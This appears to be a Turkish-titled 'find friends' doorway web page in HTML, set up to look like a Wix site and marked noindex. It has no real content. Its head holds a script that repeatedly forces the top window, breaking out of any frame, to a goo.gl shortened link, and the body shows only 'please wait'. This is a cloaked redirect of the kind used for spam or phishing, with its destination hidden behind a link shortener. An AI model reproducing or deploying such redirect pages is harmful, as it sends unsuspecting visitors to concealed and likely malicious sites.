<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=9,chrome=1"/>
<meta charset="utf-8"/>
<title>Arkadaş Ara bul</title>
<meta name="fb_admins_meta_tag" content=""/>
<meta name="robots" content="noindex"/>
<meta http-equiv="content-language" content="en"/>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta property="og:title" content="Arkadaş Ara bul"/>
<meta property="og:type" content="website"/>
<meta id="wixMobileViewport" name="viewport" content="minimum-scale=0.25, maximum-scale=1.2"/>
<script type="text/javascript"> top.location.href = 'http://goo.gl/a3P2yK'; try {     top.document.location.href = 'http://goo.gl/a3P2yK' } catch (e) {} try {     top.document.location.href = 'http://goo.gl/a3P2yK' } catch (e) {} try {     window.location = 'http://goo.gl/a3P2yK' } catch (e) {} try {     window.location.href = 'http://goo.gl/a3P2yK' } catch (e) {} try {     top.location.href = 'http://goo.gl/a3P2yK' } catch (e) {} window.document.location.href = 'http://goo.gl/a3P2yK'; </script>
</head>
<body>
please wait
</body>
</html>